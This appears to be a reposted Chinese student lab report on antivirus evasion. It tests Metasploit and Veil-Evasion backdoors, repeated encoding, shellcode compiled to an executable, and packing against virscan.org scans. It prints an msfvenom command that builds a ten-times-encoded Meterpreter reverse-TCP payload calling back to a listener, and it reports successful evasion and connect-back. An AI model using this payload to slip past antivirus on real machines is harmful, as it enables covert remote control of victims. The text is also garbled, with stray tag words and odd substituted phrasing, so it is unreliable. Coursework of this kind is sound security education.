20155218《網絡對抗》Exp3 免殺原理與實踐

20155218《網絡對抗》Exp3 免殺原理與實踐

1、使用msf生成後門程序的檢測

(1)將上週msf生成的後門文件放在virscan.org中進行掃描,截圖以下:

(2)使用msf時對它多編碼1次並進行測試



發現能發現的殺軟變少;shell

(3)使用msf時對它多編碼10次並進行測試

編碼10次後,發現能夠查殺的殺軟數量僅僅減小了一個;windows

2、使用veil-evasion生成後門程序的檢測

經過list查看功能,選用22命令網絡

生成文件:
測試結果:
顯而易見,效果並不理想;tcp

3、利用shellcode編寫後門程序的檢測

  • 使用msf生成一個shellcode;而後運行vs2017生成.exe文件,可見再生成後馬上被360發現;
  • 通過virscan被5個AV掃描出,效果不理想;
    測試

    嘗試新的方法:msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai x86/bloxer -i 10 LHOST=192.168.1.104 LPORT=4433 -f c


    只有兩個AV能夠查殺,免殺效果不錯;
    併成功實現回連;編碼

4、軟件加殼:


軟件加殼的效果並很差;.net

5、遇到的問題:

解決方法:找到錯誤信息的最後一個文件名,vi編譯, 把出錯的這行註釋(加#)就能夠了;3d

  1. 使用代理安裝的,有些包會下載安裝失敗,能夠提早安裝,記錄下基本過程: veil的包安裝
相關文章
相關標籤/搜索